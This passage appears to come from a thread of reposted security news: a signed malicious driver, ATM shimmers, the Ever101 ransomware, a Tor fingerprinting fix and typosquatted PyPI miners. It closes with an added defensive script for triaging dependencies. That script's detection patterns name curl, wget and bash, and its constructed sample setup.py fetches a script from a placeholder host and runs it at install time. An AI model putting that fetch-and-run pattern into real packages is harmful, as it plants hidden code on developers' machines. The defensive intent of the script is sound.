"The actor submitted drivers for certification through the Windows Hardware Compatibility Program. The drivers were built by a third party."

"We have suspended the account and reviewed their submissions for additional signs of malware," said Microsoft yesterday.

According to Microsoft, the threat actor has mainly targeted the gaming sector specifically in China with these malicious drivers, and there is no indication of enterprise environments having been affected so far. Microsoft has refrained from attributing this incident to nation-state actors just yet.

Falsely signed binaries can be abused by sophisticated threat actors to facilitate large-scale software supply-chain attacks. The multifaceted Stuxnet attack that targeted Iran's nuclear program marks a well-known incident in which code-signing certificates were stolen from Realtek and JMicron to facilitate the attack.

This particular incident, however, has exposed weaknesses in a legitimate code-signing process, exploited by threat actors to acquire Microsoft-signed code without compromising any certificates.

__________________
  12. In 2015, police departments worldwide started finding ATMs compromised with advanced new “shimming” devices made to steal data from chip card transactions. Authorities in the United States and abroad had seized many of these shimmers, but for years couldn’t decrypt the data on the devices. This is a story of ingenuity and happenstance, and how one former Secret Service agent helped crack a code that revealed the contours of a global organized crime ring.

Jeffrey Dant was a special agent at the U.S. Secret Service for 12 years until 2015. After that, Dant served as the global lead for the fraud fusion center at Citi, one of the largest financial institutions in the United States.

Not long after joining Citi, Dant heard from industry colleagues at a bank in Mexico who reported finding one of these shimming devices inside the card acceptance slot of a local ATM. As it happens, KrebsOnSecurity wrote about that particular shimmer back in August 2015.

This card ‘shimming’ device is made to read chip-enabled cards and can be inserted directly into the ATM’s card acceptance slot.

The shimmers were an innovation that caused concern on multiple levels. For starters, chip-based payment cards were supposed to be far more expensive and difficult for thieves to copy and clone. But these skimmers took advantage of weaknesses in the way many banks at the time implemented the new chip card standard.

Also, unlike traditional ATM skimmers that run on hidden cell phone batteries, the ATM shimmers found in Mexico did not require any external power source, and thus could remain in operation collecting card data until the device was removed.

When a chip card is inserted, a chip-capable ATM reads the data stored on the smart card by sending an electric current through the chip. Incredibly, these shimmers were able to siphon a small amount of that power (a few milliamps) to record any data transmitted by the card. When the ATM is no longer in use, the skimming device remains dormant, storing the stolen data in an encrypted format.

Dant and other investigators looking into the shimmers didn’t know at the time how the thieves who planted the devices went about gathering the stolen data. Traditional ATM skimmers are either retrieved manually, or they are programmed to transmit the stolen data wirelessly, such as via text message or Bluetooth.

But recall that these shimmers don’t have anywhere near the power needed to transmit data wirelessly, and the flexible shimmers themselves tend to rip apart when retrieved from the mouth of a compromised ATM. So how were the crooks collecting the loot?

“We didn’t know how they were getting the PINs at the time, either,” Dant recalled. “We found out later they were combining the skimmers with old school cameras hidden in fake overhead and side panels on the ATMs.”

Investigators wanted to look at the data stored on the shimmer, but it was encrypted. So they sent it to MasterCard’s forensics lab in the United Kingdom, and to the Secret Service.

“The Secret Service didn’t have any luck with it,” Dant said. “MasterCard in the U.K. was able to understand a little bit at a high level what it was doing, and they confirmed that it was powered by the chip. But the data dump from the shimmer was just encrypted gibberish.”

Organized crime gangs that specialize in deploying skimmers very often will encrypt stolen card data as a way to remove the possibility that any gang members might try to personally siphon and sell the card data in underground markets.

THE DOWNLOAD CARDS

Then in 2017, Dant got a lucky break: Investigators had found a shimming device inside an ATM in New York City, and that device appeared identical to the shimmers found in Mexico two years earlier.

“That was the first one that had showed up in the U.S. at that point,” Dant said.

The Citi team suspected that if they could work backwards from the card data that was known to have been recorded by the skimmers, they might be able to crack the encryption.

“We knew when the shimmer went into the ATM, thanks to closed-circuit television footage,” Dant said. “And we know when that shimmer was discovered. So between that time period of a couple of days, these are the cards that interacted with the skimmer, and so these card numbers are most likely on this device.”

Based on that hunch, MasterCard’s eggheads had success decoding the encrypted gibberish. But they already knew which payment cards had been compromised, so what did investigators stand to gain from breaking the encryption?

According to Dant, this is where things got interesting: They found that the same primary account number (unique 16 digits of the card) was present on the download card and on the shimmers from both New York City and Mexican ATMs.

Further research revealed that account number was tied to a payment card issued years prior by an Austrian bank to a customer who reported never receiving the card in the mail.

“So why is this Austrian bank card number on the download card and two different shimming devices in two different countries, years apart?” Dant said he wondered at the time.

He didn’t have to wait long for an answer. Soon enough, the NYPD brought a case against a group of Romanian men suspected of planting the same shimming devices in both the U.S. and Mexico. Search warrants served against the Romanian defendants turned up multiple copies of the shimmer they’d seized from the compromised ATMs.

“They found an entire ATM skimming lab that had different versions of that shimmer in untrimmed squares of sheet metal,” Dant said. “But what stood out the most was this unique device — the download card.”

The download card (right, in blue) opens an encrypted session with the shimmer, and then transmits the stolen card data to the attached white plastic device. Image: KrebsOnSecurity.com.

The download card consisted of two pieces of plastic about the width of a debit card but a bit longer. The blue plastic part — made to be inserted into a card reader — features the same contacts as a chip card. The blue plastic was attached via a ribbon cable to a white plastic card with a green LED and other electronic components.

Sticking the blue download card into a chip reader revealed the same Austrian card number seen on the shimming devices. It then became very clear what was happening.

“The download card was hard coded with chip card data on it, so that it could open up an encrypted session with the shimmer,” which also had the same card data, Dant said.

The download card, up close. Image: KrebsOnSecurity.com.

Once inserted into the mouth of an ATM card acceptance slot that’s already been retrofitted with one of these shimmers, the download card causes an encrypted data exchange between it and the shimmer. Once that two-way handshake is confirmed, the white device lights up a green LED when the data transfer is complete.

THE MASTER KEY

Dant said when the Romanian crew mass-produced their shimming devices, they did so using the same stolen Austrian bank card number. What this meant was that now the Secret Service and Citi had a master key to discover the same shimming devices installed in other ATMs.

That’s because every time the gang compromised a new ATM, that Austrian account number would traverse the global payment card networks — telling them exactly which ATM had just been hacked.

“We gave that number to the card networks, and they were able to see all the places that card had been used on their networks before,” Dant said. “We also set things up so we got alerts anytime that card number popped up, and we started getting tons of alerts and finding these shimmers all over the world.”

For all their sleuthing, Dant and his colleagues never really saw shimming take off in the United States, at least nowhere near as prevalently as in Mexico, he said.

The problem was that many banks in Mexico and other parts of Latin America had not properly implemented the chip card standard, which meant thieves could use shimmed chip card data to make the equivalent of old magnetic stripe-based card transactions.

By the time the Romanian gang’s shimmers started showing up in New York City, the vast majority of U.S. banks had already properly implemented chip card processing in such a way that the same phony chip card transactions which sailed through Mexican banks would simply fail every time they were tried against U.S. institutions.

“It never took off in the U.S., but this kind of activity went on like wildfire for years in Mexico,” Dant said.

The other reason shimming never emerged as a major threat for U.S. financial institutions is that many ATMs have been upgraded over the past decade so that their card acceptance slots are far slimmer, Dant observed.

“That download card is thicker than a lot of debit cards, so a number of institutions were quick to replace the older card slots with newer hardware that reduced the height of a card slot so that you could maybe get a shimmer and a debit card, but definitely not a shimmer and one of these download cards,” he said.

Shortly after ATM shimmers started showing up at banks in Mexico, KrebsOnSecurity spent four days in Mexico tracing the activities of a Romanian organized crime gang that had very recently started its own ATM company there called Intacash.

Sources told KrebsOnSecurity that the Romanian gang also was paying technicians from competing ATM providers to retrofit cash machines with Bluetooth-based skimmers that hooked directly up to the electronics on the inside. Hooked up to the ATM’s internal power, those skimmers could collect card data indefinitely, and the data could be collected wirelessly with a smart phone.

Follow-up reporting last year by the Organized Crime and Corruption Reporting Project (OCCRP) found Intacash and its associates compromised more than 100 ATMs across Mexico using skimmers that were able to remain in place undetected for years.

The OCCRP, which dubbed the Romanian group “The Riviera Maya Gang,” estimates the crime syndicate used cloned card data and stolen PINs to steal more than $1.2 billion from bank accounts of tourists visiting the region.

Last month, Mexican authorities arrested Florian “The Shark” Tudor, Intacash’s boss and the reputed ringleader of the Romanian skimming syndicate. Authorities charged that Tudor’s group also specialized in human trafficking, which allowed them to send gang members to compromise ATMs across the border in the United States.

__________________
  13. A ransomware attack targeting an Israeli company has led researchers to track a portion of a ransom payment to a website promoting sensual massages.

The attack was conducted by a more recent ransomware operation known as Ever101, which compromised an Israeli computer farm and proceeded to encrypt its devices.

In a new report by Israeli cybersecurity firms Profero and Security Joes, who performed incident response on the attack, Ever101 is believed to be a variant of the Everbe or Paymen45 ransomware.

When encrypting files, the ransomware will append the .ever101 extension and drop a ransom note named !=READMY=!.txt in each folder on the computer.

Example Ever101 ransom note

While investigating one of the infected machines, the researchers found a 'Music' folder that contained various tools used during the attack, providing insight into the threat actor's tactics, techniques, and procedures.

"During our investigation of the infected machines, we came across what seemed to be a treasure trove of information stored in the Music folder. It consisted of the ransomware binary itself, along with several other files—some encrypted, some not—that we believe the threat actors used to gather intelligence and propagate through the network," explains Profero and Security Joes' report.

The known tools used by the Ever101 gang include:

- xDedicLogCleaner - Cleans all Windows event logs, system logs, and the temp folder.
- PH64.exe - 64-bit version of the Process Hacker program.
- Cobalt Strike - The threat actors deployed Cobalt Strike to provide remote access to machines and perform surveillance on the network. In this particular attack, the Cobalt Strike beacon was embedded in a WEXTRACT.exe file with an expired Microsoft signature.
- SystemBC - SystemBC was used to proxy Cobalt Strike traffic through a SOCKS5 proxy to avoid detection.

Other tools were also found but were encrypted by the ransomware. Based on the names and other characteristics, the researchers believe the ransomware gang used the following tools as well:

- SoftPerfect Network Scanner - An IPv4/IPv6 network scanner.
- shadow.bat - Likely a batch file used to clear Shadow Volume Copies from the Windows device.
- NetworkShare_pre2.exe - Enumerates a Windows network for shared folders and drives.

Of interest is that some of the files shared by the attackers, such as WinRar, were localized in Arabic.

WinRar with Arabic localization

Profero CEO Omri Moyal told BleepingComputer that he believes the Arabic localization of some of these tools is a "false flag."

Following the money to a sensual massage

Of particular interest is what the researchers discovered after they used CipherTrace to track the ransom payment as it flowed through different bitcoin wallets.

While tracing the payment, they found a small portion, 0.01378880 BTC or approximately $590, was sent to a 'Tip Jar' on the RubRatings site.

RubRatings is a website that allows "massage and body rub providers" in the USA to advertise their services, many of them offering sensual massages and showing barely nude pictures. Each masseuse profile includes a Tip Jar button that allows customers to leave a bitcoin tip for their recent massage.

RubRatings Bitcoin Tip Jar

The researchers believe that some of the ransom payment went to an Ever101 operative in the USA, who then used the coins to tip a masseuse or, more likely, used the site as a way to launder the ransom payment.

"The second possibility is that the provider on the site was used as another method of obfuscating the bitcoin movement," the researchers explain. "It could be that the provider who possesses the bitcoin wallet in question was working with the threat actor(s), but more likely, it is a fake account set up to enable money transfers."

"The bitcoin in the wallet linked to RubRatings received the payment around 15:48 UTC, and it left the wallet just a few minutes later, at 15:51 UTC."

As bitcoin is becoming more easily traced, and even recovered by law enforcement, ransomware operations are looking for novel approaches to launder their ill-gotten gains.

It is likely that the threat actors created a fake account on RubRatings and were using the Tip Jar feature as a way to launder the ransom by making it look like a tip to a masseuse.

__________________
  14. The Tor Project has released Tor Browser 10.0.18 to fix numerous bugs, including a vulnerability that allows sites to track users by fingerprinting the applications installed on their devices.

In May, JavaScript fingerprinting firm FingerprintJS disclosed a 'scheme flooding' vulnerability that allows the tracking of users across different browsers based on the applications installed on their device.

To track users, a tracking profile is created for a user by attempting to open various application URL handlers, such as zoommtg://, and checking if the browser launches a prompt, like the one for Zoom below:

Zoom URL Handler

If the application's prompt is displayed, it can be assumed that the application is installed on the device. By checking for numerous URL handlers, the vulnerability can create an ID based on the unique configuration of installed apps on the user's device. This ID can then be tracked across different browsers, including Google Chrome, Edge, Tor Browser, Firefox, and Safari.

This vulnerability is especially concerning for Tor users who use the browser to protect their identity and IP address from being logged with sites. As this vulnerability tracks users across browsers, it could allow web sites, and even law enforcement, to track a user's real IP address when they switch to a non-anonymizing browser, such as Google Chrome.

With the release of Tor Browser 10.0.18, the Tor Project has introduced a fix for this vulnerability by setting the 'network.protocol-handler.external' setting to false. This default setting will prevent the browser from passing the handling of a particular URL to an external application and thus no longer trigger the application prompts.

Full changelog

The full changelog for Tor 10.0.18 is:

All Platforms
- Update Tor to
Android
- Update Fenix to 89.1.1
- Update NoScript to 11.2.8
- Bug 40055: Rebase android-components patches on 75.0.22 for Fenix 89
- Bug 40165: Announce v2 onion service deprecation on about:tor
- Bug 40166: Hide "Normal" tab (again) and Sync tab in TabTray
- Bug 40167: Hide "Save to Collection" in menu
- Bug 40169: Rebase fenix patches to fenix v89.1.1
- Bug 40170: Error building tor-browser-89.1.1-10.5-1
- Bug 40432: Prevent probing installed applications
- Bug 40470: Rebase 10.0 patches onto 89.0
Build System
Android
- Bug 40290: Update components for mozilla89-based Fenix

You can upgrade to Tor Browser 10.0.18 by opening the menu, going to Help, and selecting About Tor Browser, which will automatically check for and install any new updates.

You can also download the latest browser from the Tor Browser download page and the distribution directory.

__________________
  15. This week, multiple malicious packages were caught in the PyPI repository for Python projects that turned developers' workstations into cryptomining machines.

All malicious packages were published by the same account and tricked developers into downloading them thousands of times by using misspelled names of legitimate Python projects.

Bash script pulls in miner

A total of six packages containing malicious code infiltrated the Python Package Index (PyPI) in April:

- maratlib
- maratlib1
- matplatlib-plus
- mllearnlib
- mplatlib
- learninglib

All came from user “nedog123” and the names of most of them are misspelled versions of the matplotlib legitimate plotting software.

Ax Sharma, a security researcher at devops automation company Sonatype, analyzed the “maratlib” package in a blog post, noting that it was used as a dependency by the other malicious components.

“For each of these packages, the malicious code is contained in the setup.py file which is a build script that runs during a package’s installation,” the researcher writes.

While analyzing the package, Sharma found that it attempted to download a Bash script (aza2.sh) from a GitHub repository that is no longer available.

Sharma tracked the author’s aliases on GitHub using open-source intelligence and found that the script’s role was to run a cryptominer called “Ubqminer” on the compromised machine.

The researcher also notes that the malware author replaced the default Kryptex wallet address with their own to mine for Ubiq cryptocurrency (UBQ).

In another variant, the script included a different cryptomining program that uses GPU power, the open-source T-Rex.

Attackers are constantly targeting open-source code repositories like PyPI [1, 2, 3], the NPM for NodeJS [1, 2, 3], or RubyGems. Even if the detection comes when the download count is low, as typically happens, there is a significant risk as developers may integrate the malicious code in widely used projects.

In this case, the six malicious packages were caught by Sonatype after scanning the PyPI repo with its automated malware detection system, Release Integrity. At detection time, the packages had accumulated almost 5,000 downloads since April, with “maratlib” recording the highest download count, 2,371.

__________________
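Two checks a team can run on its own dependency list before `pip install` ever executes a `setup.py`, written as an added example for the post above; this is not Sonatype's Release Integrity or any code from Sharma's report. The first check flags requested package names that are near-misses of projects on a vetted allow-list (the allow-list here is constructed; the six candidate names are the ones named in the post), using the PEP 503 name normalisation PyPI itself applies. The second check scans `setup.py` text for install-time behaviour of the kind the post describes (fetching a script from the network and running it through a shell). The `SAMPLE_SETUP_PY` text is constructed to mimic that pattern and is not the real maratlib code; `example.invalid` is a placeholder host.

```python
"""Dependency triage for the PyPI typosquatting pattern in the post above.

Added example, not Sonatype's or the report's code.  The allow-list and the
sample setup.py below are constructed for this example.
"""
from __future__ import annotations

import difflib
import re

# Constructed allow-list: projects a team has vetted and actually depends on.
KNOWN_PACKAGES = ["matplotlib", "numpy", "pandas", "requests", "scikit-learn"]

# The six package names reported in the post (published by one account in April).
REPORTED_PACKAGES = ["maratlib", "maratlib1", "matplatlib-plus",
                     "mllearnlib", "mplatlib", "learninglib"]

# Install-time behaviour that a plotting library's setup.py has no reason to show.
SETUP_PY_INDICATORS = {
    "network_fetch": re.compile(r"urlopen\(|urlretrieve\(|requests\.get\(|\b(curl|wget)\b"),
    "shell_exec": re.compile(r"os\.system\(|subprocess\.(run|call|Popen)\(|\bbash\b"),
    "obfuscation": re.compile(r"base64\.b64decode\(|\bexec\(|\beval\("),
}


def normalize(name: str) -> str:
    """PEP 503 normalisation: case-fold and collapse runs of '-', '_' and '.'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def classify_name(name: str, known=KNOWN_PACKAGES, cutoff: float = 0.6):
    """Return ("known", match), ("suspect", match) or ("unknown", None).

    A name that is not on the allow-list but is a close string match to one
    that is (difflib ratio = 2 * matched_chars / total_length >= cutoff) is a
    likely typosquat and is reported with the project it resembles.
    """
    wanted = normalize(name)
    table = {normalize(k): k for k in known}
    if wanted in table:
        return "known", table[wanted]
    close = difflib.get_close_matches(wanted, list(table), n=1, cutoff=cutoff)
    if close:
        return "suspect", table[close[0]]
    return "unknown", None


def scan_setup_py(source: str) -> list[str]:
    """Return the indicator categories whose patterns occur in setup.py text."""
    return sorted(k for k, rx in SETUP_PY_INDICATORS.items() if rx.search(source))


# Constructed setup.py mimicking the reported pattern (download a shell script
# at install time and run it).  Not the real maratlib code; placeholder host.
SAMPLE_SETUP_PY = '''
from setuptools import setup
import os, urllib.request
urllib.request.urlretrieve("https://example.invalid/aza2.sh", "/tmp/aza2.sh")
os.system("bash /tmp/aza2.sh")
setup(name="maratlib", version="0.1")
'''


def triage(requested, setup_py_text=None):
    """Triage a list of requested package names.

    Near-misses are reported with the allow-listed project they resemble,
    unknown names are listed for manual review, and setup.py indicators are
    attached when the build script's text is supplied.
    """
    report = {"known": [], "suspect": {}, "unknown": []}
    for name in requested:
        verdict, match = classify_name(name)
        if verdict == "suspect":
            report["suspect"][name] = match
        else:
            report[verdict].append(name)
    if setup_py_text is not None:
        report["setup_py_indicators"] = scan_setup_py(setup_py_text)
    return report


if __name__ == "__main__":
    for key, value in triage(REPORTED_PACKAGES + ["matplotlib"], SAMPLE_SETUP_PY).items():
        print(f"{key}: {value}")
```

Run against the six names from the post, `maratlib`, `maratlib1`, `matplatlib-plus` and `mplatlib` come out as suspected near-misses of `matplotlib`, while `mllearnlib` and `learninglib` fall below the similarity cutoff and are only listed as unknown. That is the caveat to take from the example: string distance catches misspellings of a project you already depend on, not every fabricated name, so the unknown bucket still needs a human or a policy that blocks unlisted packages outright.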